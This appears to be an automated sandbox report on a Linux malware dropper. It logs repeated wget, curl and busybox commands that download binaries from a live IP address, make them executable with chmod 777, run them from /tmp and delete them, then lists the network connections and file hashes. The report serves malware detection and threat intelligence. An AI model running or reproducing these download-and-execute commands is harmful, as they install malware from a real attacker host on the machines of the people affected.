[/bin/busybox wget http://216.126.231.240/bins/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]

/bin/chmod

[chmod 777 QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]

/tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t

[./QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]

/bin/rm

[rm QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]

/usr/bin/wget

[wget http://216.126.231.240/bins/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]

/bin/chmod

[chmod 777 wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]

/tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK

[./wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]

/bin/rm

[rm wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]

/usr/bin/wget

[wget http://216.126.231.240/bins/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]

/bin/chmod

[chmod 777 9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]

/tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D

[./9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]

/bin/rm

[rm 9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]

/usr/bin/wget

[wget http://216.126.231.240/bins/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]

/bin/chmod

[chmod 777 dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]

/tmp/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU

[./dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]

/bin/rm

[rm dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]

/usr/bin/wget

[wget http://216.126.231.240/bins/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]

/bin/chmod

[chmod 777 O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]

/tmp/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX

[./O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]

/bin/rm

[rm O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]

/usr/bin/wget

[wget http://216.126.231.240/bins/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]

/bin/chmod

[chmod 777 rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]

/tmp/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7

[./rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]

/bin/rm

[rm rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]

/usr/bin/wget

[wget http://216.126.231.240/bins/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]

/bin/chmod

[chmod 777 UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]

/tmp/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7

[./UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]

/bin/rm

[rm UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]

/usr/bin/wget

[wget http://216.126.231.240/bins/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]

/bin/chmod

[chmod 777 gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]

/tmp/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ

[./gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]

/bin/rm

[rm gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]

/usr/bin/wget

[wget http://216.126.231.240/bins/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]

/bin/chmod

[chmod 777 THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]

/tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc

[./THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]

/bin/rm

[rm THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]

/usr/bin/wget

[wget http://216.126.231.240/bins/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]

/bin/chmod

[chmod 777 BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]

/tmp/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc

[./BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]

/bin/rm

[rm BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]

/usr/bin/wget

[wget http://216.126.231.240/bins/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]

/bin/chmod

[chmod 777 3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]

/tmp/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv

[./3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]

/bin/rm

[rm 3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]

/usr/bin/wget

[wget http://216.126.231.240/bins/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]

/bin/chmod

[chmod 777 pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]

/tmp/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd

[./pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]

/bin/rm

[rm pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]

/usr/bin/wget

[wget http://216.126.231.240/bins/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]

/bin/chmod

[chmod 777 ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]

/tmp/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp

[./ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]

/bin/rm

[rm ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]

Network

Country Destination Domain Proto
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp

Files

/tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97